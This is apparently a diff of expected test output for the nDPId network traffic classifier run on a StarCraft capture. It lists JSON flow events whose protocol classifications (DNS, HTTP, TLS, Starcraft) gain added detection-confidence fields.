+00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1437389985821,"flow_last_seen":1437389985912,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":152,"flow_tot_l4_payload_len":388,"flow_avg_l4_payload_len":97,"midstream":0,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":55468,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1437389968488,"flow_last_seen":1437389968521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"173.194.113.224","src_port":3484,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
 00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1437389968488,"flow_last_seen":1437389968521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"173.194.113.224","src_port":3484,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00656{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1437389985891,"flow_last_seen":1437389985996,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":35189,"flow_avg_l4_payload_len":858,"midstream":0,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3527,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"}}
-00656{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1437389985892,"flow_last_seen":1437389985994,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":23509,"flow_avg_l4_payload_len":810,"midstream":0,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3528,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"}}
-00656{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1437389985898,"flow_last_seen":1437389985969,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":23506,"flow_avg_l4_payload_len":810,"midstream":0,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3529,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"}}
-00656{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1437389985898,"flow_last_seen":1437389985982,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":23506,"flow_avg_l4_payload_len":810,"midstream":0,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3530,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"}}
-00656{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1437389985923,"flow_last_seen":1437389985992,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":23506,"flow_avg_l4_payload_len":810,"midstream":0,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3531,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"}}
+00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1437389985891,"flow_last_seen":1437389985996,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":35189,"flow_avg_l4_payload_len":858,"midstream":0,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3527,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
+00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1437389985892,"flow_last_seen":1437389985994,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":23509,"flow_avg_l4_payload_len":810,"midstream":0,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3528,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
+00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1437389985898,"flow_last_seen":1437389985969,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":23506,"flow_avg_l4_payload_len":810,"midstream":0,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3529,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
+00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1437389985898,"flow_last_seen":1437389985982,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":23506,"flow_avg_l4_payload_len":810,"midstream":0,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3530,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
+00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1437389985923,"flow_last_seen":1437389985992,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":23506,"flow_avg_l4_payload_len":810,"midstream":0,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3531,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985925,"flow_last_seen":1437389985961,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3532,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985925,"flow_last_seen":1437389985962,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3533,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00617{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985960,"flow_last_seen":1437389985960,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3534,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00653{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985960,"flow_last_seen":1437389985960,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3534,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985960,"flow_last_seen":1437389985960,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3534,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00661{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":215,"flow_first_seen":1437389982130,"flow_last_seen":1437389985956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":38286,"flow_avg_l4_payload_len":178,"midstream":0,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"213.248.127.130","src_port":3517,"dst_port":1119,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Starcraft","breed":"Fun","category":"Game"}}
-00603{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968519,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.114","src_port":3479,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":215,"flow_first_seen":1437389982130,"flow_last_seen":1437389985956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":38286,"flow_avg_l4_payload_len":178,"midstream":0,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"213.248.127.130","src_port":3517,"dst_port":1119,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Starcraft","breed":"Fun","category":"Game"}}
+00639{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968519,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.114","src_port":3479,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968519,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.114","src_port":3479,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00603{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968525,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.114","src_port":3480,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00639{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968525,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.114","src_port":3480,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968525,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.114","src_port":3480,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00603{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968520,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.114","src_port":3481,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00639{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968520,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.114","src_port":3481,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968520,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.114","src_port":3481,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00603{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968519,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.114","src_port":3482,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00639{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968519,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.114","src_port":3482,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968519,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.114","src_port":3482,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00603{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3489,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00639{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3489,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3489,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00603{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3490,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00639{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3490,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3490,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00603{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968522,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3491,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00639{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968522,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3491,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968522,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3491,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00603{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968486,"flow_last_seen":1437389968520,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3492,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00639{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968486,"flow_last_seen":1437389968520,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3492,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968486,"flow_last_seen":1437389968520,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":13,"midstream":1,"ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.104","src_port":3492,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
